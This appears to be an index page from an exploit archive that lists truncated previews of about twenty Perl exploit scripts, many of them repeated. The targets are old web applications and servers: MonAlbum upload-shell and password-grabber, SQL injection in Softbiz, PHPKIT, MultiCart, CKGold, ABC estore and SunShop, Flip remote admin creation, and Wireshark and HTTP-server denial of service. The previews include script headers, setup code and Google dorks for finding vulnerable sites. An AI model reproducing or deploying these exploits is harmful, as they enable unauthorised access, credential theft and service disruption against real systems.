MonAlbum 0.87 Upload Shell / Password Grabber Exploit

Exploit for unknown platform in category web applications ===================================================== MonAlbum 0.87 Upload Shell / Password Grabber Exploit ===================================================== !/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use...

MonAlbum 0.87 - Arbitrary File Upload Password Grabber

MonAlbum 0.87 - Arbitrary File Upload Password Grabber !/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg';...

softbix-sql.txt

!/usr/bin/perl Softbiz Freelancers Script V.1 Multiple Remote Vulnerabilities SQL Injection Exploit/XSS AUTHOR : IRCRASH Dr.Crash Script Download : http://www.softbizscripts.com/ DORK: "Search Projects" intitle:"The ultimate project website" Our English Forum : http://ircrash.com/english/ XSS...

Softbiz Freelancers Script 1 - SQL Injection

Softbiz Freelancers Script 1 - SQL Injection !/usr/bin/perl Softbiz Freelancers Script V.1 Multiple Remote Vulnerabilities SQL Injection Exploit/XSS AUTHOR : IRCRASH Dr.Crash Script Download : http://www.softbizscripts.com/ DORK: "Search Projects" intitle:"The ultimate project website" Our Englis...

PHPKIT 1.6.4pl1 - 'article.php' SQL Injection

!/usr/bin/perl Vulnerability found & exploit written by $h4d0wl33t shadowleet Contact: [email protected] Phpkit 1.6.4pl1 Non Public Exploit by $hadowleet, Description: Vulnerability in file pkinc/public/article.php On line 71: $contentid=!$contentid && isset$REQUEST'contentid' &&...

MultiCart 1.0 Remote Blind SQL Injection Exploit

No description provided by source. Indonesian Newhack Security Advisory ------------------------------------ MultiCart 1.0 Remote Blind SQL Injection Waktu : Sep 30 2007 02:00AM Software : MultiCart 1.0 Vendor : http://www.iscripts.com/multicart/ Ditemukan oleh : k1tk4t | http://newhack.org Lokas...

MultiCart 1.0 - Blind SQL Injection

MultiCart 1.0 - Blind SQL Injection Indonesian Newhack Security Advisory ------------------------------------ MultiCart 1.0 Remote Blind SQL Injection Waktu : Sep 30 2007 02:00AM Software : MultiCart 1.0 Vendor : http://www.iscripts.com/multicart/ Ditemukan oleh : k1tk4t | http://newhack.org Loka...

MultiCart 1.0 - Blind SQL Injection

Indonesian Newhack Security Advisory ------------------------------------ MultiCart 1.0 Remote Blind SQL Injection Waktu : Sep 30 2007 02:00AM Software : MultiCart 1.0 Vendor : http://www.iscripts.com/multicart/ Ditemukan oleh : k1tk4t | http://newhack.org Lokasi : Indonesia ----...

Flip 3.0 - Remote Admin Creation

Flip 3.0 - Remote Admin Creation !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admi...

Flip 3.0 - Remote Admin Creation

!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...

Flip <= 3.0 Remoe Admin Creation Exploit

No description provided by source. !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip = 3.0"; my $type = "Admin Creation"; my $author = "undefined1"; my $vendor = "http://sourceforge.net/projects/flipsource"; my %opt; getopts"t:", %opt; $| = 1; print ":: $app $type - by...

ckgold-sql.txt

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV4 print "\n |-------------------------------------------------|"; print "\n | newhackdotorg |"; print "\n |-------------------------------------------------|"; print "\n | CKGold Shopping Cart v2.0 Blind SQL Injection |"; print "\n |...

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

!/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.4.52'; my $port = 20000; my...

ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print "\n |-------------------------------------------------|"; print "\n | newhackdotorg |"; print "\n |-------------------------------------------------|"; print "\n | ABC estore 3.0 catid Blind SQ...

SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print "\n \'/ "; print "\n -.- "; print "\n -----------------oOO------OOo------------------"; print "\n | SunShop v4.0 RC 6 search Blind SQL Injection |"; print "\n | k1tk4t - Indonesia -...

SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print "\n \'/ "; print "\n -.- "; print "\n -----------------oOO------OOo------------------"; print "\n | SunShop v4.0 RC 6 search Blind SQL Injection |"; print "\n | k1tk4t - Indonesia - newhackdotorg |"; print "\n | coded by DNX...

LiteWEB 2.7 404 Denial of Services

LiteWEB 2.7 404 Denial of Services ----------------------------------- if u send to the server more than 100 requests to nonexisting pages the server will stop to answer. Site: http://www.cmfperception.com/liteweb.html Found By Shay Priel aka Prili - impriliatgmail.com POC: ---- !/usr/bin/perl...

HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print...

httpsv162-dos.txt

!/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print "HTTP SERVER httpsv1.6.2 404 Denial o...

BugHunter HTTP Server 1.6.2 - httpsv.exe GET 404 Remote Denial of Service

BugHunter HTTP Server 1.6.2 - httpsv.exe GET 404 Remote Denial of Service !/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print...